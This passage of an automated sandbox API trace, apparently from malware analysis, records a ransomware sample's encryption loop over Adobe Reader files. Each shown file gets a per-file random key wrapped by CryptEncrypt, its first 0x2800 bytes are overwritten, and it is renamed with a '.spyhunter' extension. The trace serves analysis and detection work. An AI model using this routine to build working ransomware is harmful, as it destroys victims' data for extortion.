(x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerum.htm.spyhunter")) returned 1 [0119.636] GetProcessHeap () returned 0x2c0000 [0119.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0119.636] GetProcessHeap () returned 0x2c0000 [0119.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0119.636] GetProcessHeap () returned 0x2c0000 [0119.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f4c0 | out: hHeap=0x2c0000) returned 1 [0119.637] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f908 | out: pbBuffer=0x248f908) returned 1 [0119.637] GetProcessHeap () returned 0x2c0000 [0119.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0119.637] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f900*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f900*=0x30) returned 1 [0119.637] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmej.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0119.659] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm") returned 56 [0119.659] StrStrW (lpFirst="ReadMeJ.htm", lpSrch=".txt") returned 0x0 [0119.659] GetProcessHeap () returned 0x2c0000 [0119.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0119.659] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f8c4*=0x17b8, lpOverlapped=0x0) returned 1 [0119.706] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffe848, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.706] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x17b8, lpNumberOfBytesWritten=0x248f8c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f8c4*=0x17b8, lpOverlapped=0x0) returned 1 [0119.706] GetProcessHeap () returned 0x2c0000 [0119.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0119.706] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.706] WriteFile (in: hFile=0x17c, lpBuffer=0x248f904*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8c4, lpOverlapped=0x0 | out: lpBuffer=0x248f904*, lpNumberOfBytesWritten=0x248f8c4*=0x4, lpOverlapped=0x0) returned 1 [0119.706] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8c4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8c4*=0x30, lpOverlapped=0x0) returned 1 [0119.706] CloseHandle (hObject=0x17c) returned 1 [0119.707] GetProcessHeap () returned 0x2c0000 [0119.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0119.707] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm.spyhunter") returned 66 [0119.707] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmej.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmej.htm.spyhunter")) returned 1 [0119.708] GetProcessHeap () returned 0x2c0000 [0119.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0119.708] GetProcessHeap () returned 0x2c0000 [0119.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0119.708] GetProcessHeap () returned 0x2c0000 [0119.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f280 | out: hHeap=0x2c0000) returned 1 [0119.708] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f900 | out: pbBuffer=0x248f900) returned 1 [0119.708] GetProcessHeap () returned 0x2c0000 [0119.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0119.709] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8f8*=0x30) returned 1 [0119.709] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeSongStd-Light.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobesongstd-light.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0119.715] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeSongStd-Light.otf") returned 84 [0119.715] StrStrW (lpFirst="AdobeSongStd-Light.otf", lpSrch=".txt") returned 0x0 [0119.715] GetProcessHeap () returned 0x2c0000 [0119.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0119.715] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f8bc*=0x2800, lpOverlapped=0x0) returned 1 [0119.742] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.742] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f8bc*=0x2800, lpOverlapped=0x0) returned 1 [0119.742] GetProcessHeap () returned 0x2c0000 [0119.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0119.742] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.743] WriteFile (in: hFile=0x17c, lpBuffer=0x248f8fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8bc, lpOverlapped=0x0 | out: lpBuffer=0x248f8fc*, lpNumberOfBytesWritten=0x248f8bc*=0x4, lpOverlapped=0x0) returned 1 [0119.757] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8bc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8bc*=0x30, lpOverlapped=0x0) returned 1 [0119.757] CloseHandle (hObject=0x17c) returned 1 [0119.757] GetProcessHeap () returned 0x2c0000 [0119.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0119.757] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeSongStd-Light.otf.spyhunter") returned 94 [0119.757] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeSongStd-Light.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobesongstd-light.otf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeSongStd-Light.otf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobesongstd-light.otf.spyhunter")) returned 1 [0119.758] GetProcessHeap () returned 0x2c0000 [0119.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0119.758] GetProcessHeap () returned 0x2c0000 [0119.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0119.758] GetProcessHeap () returned 0x2c0000 [0119.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4b3d0 | out: hHeap=0x2c0000) returned 1 [0119.758] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f900 | out: pbBuffer=0x248f900) returned 1 [0119.758] GetProcessHeap () returned 0x2c0000 [0119.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0119.758] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8f8*=0x30) returned 1 [0119.758] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMingStd-Light.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobemingstd-light.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0119.771] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMingStd-Light.otf") returned 84 [0119.771] StrStrW (lpFirst="AdobeMingStd-Light.otf", lpSrch=".txt") returned 0x0 [0119.771] GetProcessHeap () returned 0x2c0000 [0119.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0119.771] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f8bc*=0x2800, lpOverlapped=0x0) returned 1 [0119.799] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.799] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f8bc*=0x2800, lpOverlapped=0x0) returned 1 [0119.799] GetProcessHeap () returned 0x2c0000 [0119.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0119.799] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.799] WriteFile (in: hFile=0x17c, lpBuffer=0x248f8fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8bc, lpOverlapped=0x0 | out: lpBuffer=0x248f8fc*, lpNumberOfBytesWritten=0x248f8bc*=0x4, lpOverlapped=0x0) returned 1 [0119.896] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8bc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8bc*=0x30, lpOverlapped=0x0) returned 1 [0119.896] CloseHandle (hObject=0x17c) returned 1 [0119.896] GetProcessHeap () returned 0x2c0000 [0119.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0119.896] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMingStd-Light.otf.spyhunter") returned 94 [0119.896] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMingStd-Light.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobemingstd-light.otf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMingStd-Light.otf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobemingstd-light.otf.spyhunter")) returned 1 [0119.897] GetProcessHeap () returned 0x2c0000 [0119.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0119.897] GetProcessHeap () returned 0x2c0000 [0119.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0119.898] GetProcessHeap () returned 0x2c0000 [0119.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4b2d8 | out: hHeap=0x2c0000) returned 1 [0119.898] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8f8 | out: pbBuffer=0x248f8f8) returned 1 [0119.898] GetProcessHeap () returned 0x2c0000 [0119.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0119.898] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8f0*=0x30) returned 1 [0119.898] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UTF16-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-utf16-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0119.923] GetProcessHeap () returned 0x2c0000 [0119.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0119.924] GetProcessHeap () returned 0x2c0000 [0119.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e635c0 | out: hHeap=0x2c0000) returned 1 [0119.927] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8f0 | out: pbBuffer=0x248f8f0) returned 1 [0119.927] GetProcessHeap () returned 0x2c0000 [0119.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0119.927] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8e8*=0x30) returned 1 [0119.927] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZY______.PFB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zy______.pfb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0119.931] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZY______.PFB") returned 71 [0119.931] StrStrW (lpFirst="ZY______.PFB", lpSrch=".txt") returned 0x0 [0119.931] GetProcessHeap () returned 0x2c0000 [0119.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0119.931] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f8ac*=0x2800, lpOverlapped=0x0) returned 1 [0119.972] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.972] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f8ac*=0x2800, lpOverlapped=0x0) returned 1 [0119.972] GetProcessHeap () returned 0x2c0000 [0119.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0119.972] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.972] WriteFile (in: hFile=0x17c, lpBuffer=0x248f8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8ac, lpOverlapped=0x0 | out: lpBuffer=0x248f8ec*, lpNumberOfBytesWritten=0x248f8ac*=0x4, lpOverlapped=0x0) returned 1 [0119.994] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8ac, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8ac*=0x30, lpOverlapped=0x0) returned 1 [0119.994] CloseHandle (hObject=0x17c) returned 1 [0119.994] GetProcessHeap () returned 0x2c0000 [0119.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2eb7be8 [0119.994] wnsprintfW (in: pszDest=0x2eb7be8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZY______.PFB.spyhunter") returned 81 [0119.994] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZY______.PFB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zy______.pfb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZY______.PFB.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zy______.pfb.spyhunter")) returned 1 [0119.995] GetProcessHeap () returned 0x2c0000 [0119.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7be8 | out: hHeap=0x2c0000) returned 1 [0119.995] GetProcessHeap () returned 0x2c0000 [0119.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0119.995] GetProcessHeap () returned 0x2c0000 [0119.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7b100 | out: hHeap=0x2c0000) returned 1 [0119.995] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8f0 | out: pbBuffer=0x248f8f0) returned 1 [0119.995] GetProcessHeap () returned 0x2c0000 [0119.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0119.995] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8e8*=0x30) returned 1 [0119.995] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-regular.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0119.996] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Regular.otf") returned 80 [0119.996] StrStrW (lpFirst="MyriadPro-Regular.otf", lpSrch=".txt") returned 0x0 [0119.996] GetProcessHeap () returned 0x2c0000 [0119.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0119.997] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f8ac*=0x2800, lpOverlapped=0x0) returned 1 [0120.077] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.077] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f8ac*=0x2800, lpOverlapped=0x0) returned 1 [0120.077] GetProcessHeap () returned 0x2c0000 [0120.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0120.078] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.078] WriteFile (in: hFile=0x17c, lpBuffer=0x248f8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8ac, lpOverlapped=0x0 | out: lpBuffer=0x248f8ec*, lpNumberOfBytesWritten=0x248f8ac*=0x4, lpOverlapped=0x0) returned 1 [0120.098] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8ac, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8ac*=0x30, lpOverlapped=0x0) returned 1 [0120.098] CloseHandle (hObject=0x17c) returned 1 [0120.098] GetProcessHeap () returned 0x2c0000 [0120.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2eb7be8 [0120.098] wnsprintfW (in: pszDest=0x2eb7be8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Regular.otf.spyhunter") returned 90 [0120.098] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-regular.otf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Regular.otf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-regular.otf.spyhunter")) returned 1 [0120.099] GetProcessHeap () returned 0x2c0000 [0120.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7be8 | out: hHeap=0x2c0000) returned 1 [0120.099] GetProcessHeap () returned 0x2c0000 [0120.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0120.099] GetProcessHeap () returned 0x2c0000 [0120.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7f400 | out: hHeap=0x2c0000) returned 1 [0120.099] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f8e8 | out: pbBuffer=0x248f8e8) returned 1 [0120.099] GetProcessHeap () returned 0x2c0000 [0120.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0120.099] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f8e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f8e0*=0x30) returned 1 [0120.099] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\minionpro-regular.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0120.100] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Regular.otf") returned 80 [0120.100] StrStrW (lpFirst="MinionPro-Regular.otf", lpSrch=".txt") returned 0x0 [0120.100] GetProcessHeap () returned 0x2c0000 [0120.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0120.100] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f8a4*=0x2800, lpOverlapped=0x0) returned 1 [0120.102] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.103] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f8a4*=0x2800, lpOverlapped=0x0) returned 1 [0120.103] GetProcessHeap () returned 0x2c0000 [0120.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0120.103] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.103] WriteFile (in: hFile=0x17c, lpBuffer=0x248f8e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8a4, lpOverlapped=0x0 | out: lpBuffer=0x248f8e4*, lpNumberOfBytesWritten=0x248f8a4*=0x4, lpOverlapped=0x0) returned 1 [0120.111] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8a4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8a4*=0x30, lpOverlapped=0x0) returned 1 [0120.111] CloseHandle (hObject=0x17c) returned 1 [0120.119] GetProcessHeap () returned 0x2c0000 [0120.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2eb7be8 [0120.119] wnsprintfW (in: pszDest=0x2eb7be8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Regular.otf.spyhunter") returned 90 [0120.119] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MinionPro-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 